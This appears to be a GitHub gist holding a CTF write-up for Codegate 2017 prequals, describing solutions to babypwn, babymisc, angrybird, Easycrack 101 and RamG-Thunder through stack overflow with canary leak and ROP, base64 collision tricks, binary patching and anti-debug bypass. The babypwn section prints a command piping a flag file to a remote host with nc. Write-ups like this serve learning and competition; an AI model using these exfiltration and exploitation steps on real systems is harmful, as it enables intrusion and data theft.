Skip to content

Instantly share code, notes, and snippets.

@parksjin01

parksjin01/Codegate-prequals 2017 writeup.md

Last active June 26, 2017 07:10
Show Gist options
  • Save parksjin01/af2b1c86afad7b94cb1c39d6df07609f to your computer and use it in GitHub Desktop.
Save parksjin01/af2b1c86afad7b94cb1c39d6df07609f to your computer and use it in GitHub Desktop.
Download ZIP
Codegate-prequals 2017 writeup
Raw
Codegate-prequals 2017 writeup.md

babypwn

  • program is small and simple. Just normal stackoverflow problem, and we can get canary by memory leak.
  • It's server program so get user input by recv() function and this function add 0x0a at the end of user input.
  • So if we type just 40bytes of letter than we can get canary. canary's last byte is overwritten with 0x0a but it doesn't matter
  • Most of cases, canary's last byte is just \x00 so we can just guess last is \x00
  • Next protection is NX, we can bypass NX by ROP and Return to libc method.
  • I make [simple python script] which do ls -al command. But there are critical error in script.
  • I have to send the result to client side and I need to do it by redirection of IO. But I can't find how to call function in libc many times with rop chain in x86 program.
  • I solve this problem, I have question about rop chain yet but I solved it with linux command.
  • I use cat ./flag|nc 192.168.0.3 instead of ls -al and I solved it. But I can't understand why other people's writeup doesn't work very well
  • This is answer script

babymisc

  • It's really simple problem, we don't have to overflow it or overflow or do any other things
  • This problem is related with base64 encoding collision problem.
  • If encrypted string has '==' than there are 16 collision string
  • If encrypted string has '=' than there are 4 collision string
  • For example YQ== and YR== is decrypted as a
  • First question can pass with b64 encoding collsion. Second question can solve with user function error. We can solve it with just add =
  • Last we can input linux command with b64 encrypted. But we can't use cat ./flag. So I use more fl* instead.
  • I also made auto python script that can make solve problem automatically and send command.
  • But you can't use more fl* command with script so you need to use another command or solve problem by your hands.

Meow

  • I'm stuck in guessing original key of md5. I see other's writeup how they guess that part.

angrybird

  • When you try to execute binary, you can't excute it and it just exit. We can find the reason by debugging it by IDA or other debuggers...
  • There are some trash code which makes excution impossible. We have to patch that code to solve it.
0000000000400776         xor        eax, eax
0000000000400778         cmp        eax, 0x0
000000000040077b         je         j_exit
  • That part makes excution impossible so we have to change it to nop instruction
  • Next binary call 0x4006f6 user function.
00000000004006f6         push       rbp                                         ; CODE XREF=sub_400761+69
00000000004006f7         mov        rbp, rsp
00000000004006fa         mov        edi, 0x405064                               ; "you should return 21 not 1 :(", argument "s" for method j_puts
00000000004006ff         call       j_puts
0000000000400704         mov        eax, dword [0x606060]
000000000040070a         pop        rbp
000000000040070b         ret
  • It returns the value in 0x606060 and function saids that value should be 21 not 1. So we have to patch it.
  • And then binary call 0x40070c however we don't have to call it so change it to nop instruction.
  • Finally binary call 0x40072a user function before fgets. In that function it compares $rbp-0x58 and 0x40508e. Later we use $rbp-0x58 in if statements so I thought change that value as same as 0x405082 so patch that.
  • Now we input 21 letters and if we pass the if statements(which has about 400 conditions) we can get the flag.
  • However it's too hard to guess correct password by human so we need to use angr python framework. It was release first at 2015 defcon and found many vulnerbilities with that framework. Many people is interested in it and there are many guide books in google so I won't explain it.
  • There are python script

Easycrack 101

  • When I solve this problem, I could feel angr is really interesting framework and many people is intereted in this.
  • In this contest there was other problem which is related with angr and this problem is also related with it.
  • Program's logic is very simple. Get user input with argv and pass some if conditions. If user input pass all if conditions than program print Good job and if user input couldn't pass any of if conditions than print NoNo. All 101 files logic is same. Only hard part is just amount of file.
  • I thought I could automate it with angr and python but I'm not familiar with angr so I just found all adress's by my hand...
  • Python script is in here
  • I couldn't search avoid address because there are too many files, and I think it makes memory problem. Actually that script can't run 101 files at once and should run it many times like 1 to 20 and 20 to 30.
  • After find all 101 keys there are no strings which looks like flag. So I search writeup and found that there was a website, we have to authenticate that website to get flag and 101keys were used in authentication.

RamG-Thunder

  • When we run this program they see menu 0-3 but if we input 4 we can enter hidden menu. In hidden menu we can try to find flags.
  • Image. In image we can see
cmp eax, 4
ja RamG.0105150d

We can get hidden menu when we enter 4 because of ja. If we enter 4, jump instruction doesn't occur

  • Now we can get see hidden menu and 2nd option is finding flag game. let's try this.
  • There are 5 stage in this game and there are some interesting point in here. stage logic is symmetric. stage 1 and 5 use same procedure to clear it and stage 2 and 4 use same thing.
  • In 1st stage, We have to find strings which xor with 47459 makes MUYLX. It is yamya, so we have to input yamya
  • In 1st and 5th stage there are anti debugging code like Image. So we have to change jne instruction to nop
  • In 2nd stage, program doesn't get user input. Instead they compare user computers mac address with their own.
  • Image. In ebx+194 to ebx+196 has user computers mac address and it should be 0xc8, 0x59, 0x78. Image So let's change these three to them.
  • In 3rd stage, if there are Hellow register in HKCU and we can get hellow_FishWorld key's value we can pass this stage.
  • In 4th stage, we can pass it as same method as 2nd one. Image Only change is now user mac address is in edi+194 to edi+196 and we have to change it like 0x00, 0x0c, and 0x29. Image so now change these three to 0x00, 0x0c and 0x29.
  • Finally in 5th stage, we have to input 5 length strings which xor with 36742 go to [S[X] and it's hello. So let's input hello
  • After pass all 5 stages we can notify file named c is created. We can know it's png file if we open it with hex editor. So let's change it's extension to png and open it.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment